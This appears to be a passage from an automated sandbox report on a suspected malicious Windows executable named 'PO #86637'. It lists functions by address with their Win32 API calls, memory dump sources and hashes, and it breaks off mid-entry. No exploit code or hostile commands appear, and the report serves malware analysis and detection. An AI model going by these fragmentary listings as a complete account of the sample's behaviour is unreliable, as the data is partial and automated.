                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastselect
                      • String ID:
                      • API String ID: 215497628-0
                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                      Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 0044443B
                      • GetKeyboardState.USER32(?), ref: 00444450
                      • SetKeyboardState.USER32(?), ref: 004444A4
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                      Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 00444633
                      • GetKeyboardState.USER32(?), ref: 00444648
                      • SetKeyboardState.USER32(?), ref: 0044469C
                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                      Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __snwprintf__wcsicoll_wcscpy
                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                      • API String ID: 1729044348-3025626884
                      • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                      • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                      • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                      • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                      Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                      • String ID:
                      • API String ID: 2354583917-0
                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                      Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                      Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                      Download Yara Rule
                      APIs
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Enable$Show$MessageMoveSend
                      • String ID:
                      • API String ID: 896007046-0
                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                      Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                      • GetFocus.USER32 ref: 00448ACF
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Enable$Show$FocusMessageSend
                      • String ID:
                      • API String ID: 3429747543-0
                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                      Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 3300667738-0
                      • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                      • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                      Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                      • __swprintf.LIBCMT ref: 0045D4E9
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu$\VH
                      • API String ID: 3164766367-2432546070
                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                      Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Msctls_Progress32
                      • API String ID: 3850602802-3636473452
                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                      Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                      • String ID:
                      • API String ID: 3985565216-0
                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                      Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _malloc.LIBCMT ref: 0041F707
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • _free.LIBCMT ref: 0041F71A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AllocateHeap_free_malloc
                      • String ID: [B
                      • API String ID: 1020059152-632041663
                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                      Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                      Download Yara Rule
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                      • __calloc_crt.LIBCMT ref: 00413DB0
                      • __getptd.LIBCMT ref: 00413DBD
                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                      • _free.LIBCMT ref: 00413E07
                      • __dosmaperr.LIBCMT ref: 00413E12
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                      • String ID:
                      • API String ID: 155776804-0
                      • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                      • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                      Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
